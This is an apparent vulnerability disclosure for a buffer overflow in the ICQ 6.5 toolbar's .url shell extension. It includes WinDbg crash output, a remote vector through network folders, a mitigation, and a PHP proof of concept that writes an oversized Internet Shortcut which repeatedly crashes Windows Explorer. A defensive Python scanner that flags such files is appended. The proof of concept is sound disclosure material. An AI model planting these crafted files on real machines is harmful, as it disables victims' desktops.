
ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer rmt buf overflow



ICQ 6.5 URL Search Hook/ICQToolBar.dll .URL file processing Windows Explorer remote buffer overflow poc



http://retrogod.altervista.org/

If the resulting file is placed on the desktop, against e.g. XP SP3,
the explorer.exe process will exit with code 1282 (0x502), that is
ERROR_STACK_BUFFER_OVERRUN, and crash repeatedly; you cannot even browse a folder
if the file is present in it.
Solution: disable the shell extension; you may try ShellExView by NirSoft.

Note (added 30/05/2009, remote vector added): it works with network folders
too ...

Against a Win2k3 where explorer.exe is not compiled with the /GS flag:

(f44.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=???? <-----
0:010> g
(f44.104): Access violation - code c0000005 (!!! second chance !!!)
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
SHLWAPI!Ordinal400+0x2d:
772a533f 668906          mov     word ptr [esi],ax        ds:0023:00610061=???? <-----
0:010> gn
eax=00000001 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=00000001
eip=7ffe0304 esp=0178fcf0 ebp=0178ff44 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
SharedUserData!SystemCallStub+0x4:
7ffe0304 c3              ret

Prepare a network folder with the .url file inside. This works
against Internet Explorer too by a hyperlink to the network folder.

<?php
// Build an Internet Shortcut whose URL= value is 2184 bytes of 'a' (0x61),
// the length that triggers the crash described above.
$____x = "[InternetShortcut]\x0d\x0a".
         "URL=".str_repeat("\x61",2184);
file_put_contents("9sg_poc.url",$____x);
?>
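As an added defensive example (not part of the original PoC), a small Python scanner that parses the INI-style .url format the way the shell reads it and flags an InternetShortcut whose URL= value is oversized; the 1024-byte threshold is an assumption chosen for illustration, not a limit taken from ICQToolBar.dll, and the sample files are constructed here.

```python
"""Flag .url (Internet Shortcut) files carrying an oversized URL= value.

Added example for this advisory, not the author's code. The 2184-byte sample
mirrors the PoC above; URL_LEN_THRESHOLD is an assumed, illustrative cut-off.
"""
import re

URL_LEN_THRESHOLD = 1024  # assumption: far beyond any URL a shortcut needs


def parse_internet_shortcut(data: bytes) -> dict:
    """Parse the INI-style .url format into {section: {key: value}}.

    Section and key names are lower-cased, matching the case-insensitive
    profile-string lookup Windows uses for these files.
    """
    sections, current = {}, None
    for raw in data.decode("latin-1").splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def check_shortcut(data: bytes, limit: int = URL_LEN_THRESHOLD) -> dict:
    """Return {is_shortcut, url_len, suspicious} for one .url file's bytes."""
    sections = parse_internet_shortcut(data)
    url = sections.get("internetshortcut", {}).get("url", "")
    return {
        "is_shortcut": "internetshortcut" in sections,
        "url_len": len(url),
        "suspicious": len(url) > limit,
    }


# Constructed samples: one benign shortcut, one shaped like the PoC above.
BENIGN = b"[InternetShortcut]\r\nURL=http://example.invalid/\r\n"
POC_LIKE = b"[InternetShortcut]\r\nURL=" + b"\x61" * 2184

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("poc_like", POC_LIKE)):
        print(name, check_shortcut(blob))
```

Run it over every *.url in a shared folder before Explorer renders that folder to find files worth quarantining while the shell extension is still enabled.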
=0D
#original url: http://retrogod.altervista.org/9sg_icq_dos.html
